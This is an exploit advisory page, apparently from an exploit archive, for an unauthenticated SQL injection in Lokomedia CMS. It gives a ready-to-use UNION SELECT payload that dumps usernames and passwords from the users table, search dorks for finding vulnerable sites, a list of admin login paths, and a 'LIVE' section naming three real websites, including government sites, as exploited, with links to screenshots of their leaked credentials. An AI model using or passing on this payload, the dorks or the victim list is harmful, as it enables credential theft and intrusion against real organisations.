Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>########################### # Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability ########################### ========================================================= [+] Title :- Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability [+] Vendor Homepage :- http://www.bukulokomedia.com/ [+] Version :- All Versions [+] Tested on :- Linux - Windows - Mac [+] Category :- webapps [+] Exploit Author :- K33P-S1L3NT [+] Team name :- Ternate Lab Pentesting [+] Official Page :- www.facebook.com/loading.gov/ [+] Available :- sql injection cheat sheet | sql injection Remote exploit [+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka | DZ hacker's | Algerian Hack [+] Contact :- aurorakoizora@gmail.com ========================================================= [+] Severity Level :- Medium [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id, statis-1-profil.html (string ) statis-3-strukturorganisasi.html (string ) statis-1-visimisi.html (string) statis-1-tujuan.html (string) [+] Dork : - statis-1-profil.html (work100% ) statis-3-strukturorganisasi.html (work100% ) statis-1-visimisi.html (work100%) statis-1-tujuan.html (work100%) [+] Local Admin /redaktur /adminweb /administrator /redaktur/index.php /adminlogin /admin /login.php [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/user/public_html/XXX.php [+] POC : http://127.0.0.1/statis-1( exploit-code )profil.html - http://127.0.0.1/statis-3( exploit-code )strukturorganisasi.html - http://127.0.0.1/statis-1( exploit-code )visimisi.html - http://127.0.0.1/statis-1( exploit-code )tujuan.html ######################################################## [+] Exploit /statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ ########################################################## [+] Testing http://127.0.0.1/statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html [+] NOTE username & password open on title-bar or CTRL+U for view username & password this website exploit ########################################################### [+] LIVE http://portal.ukit.ac.id ( Title-bar http://i.imgur.com/mYXPvpG.png ) ( CRTL+U http://i.imgur.com/2zKzC5o.png ) http://www.ptun-padang.go.id ( Title-bar http://i.imgur.com/3ZdoHaI.png ) ( CTRL+U http://i.imgur.com/eX1qKc5.png ) http://www.anambaskab.go.id ( Title-bar http://i.imgur.com/o4gQd0o.png ) ( CTRL+U http://i.imgur.com/WOriRul.png ) </BODY></HTML>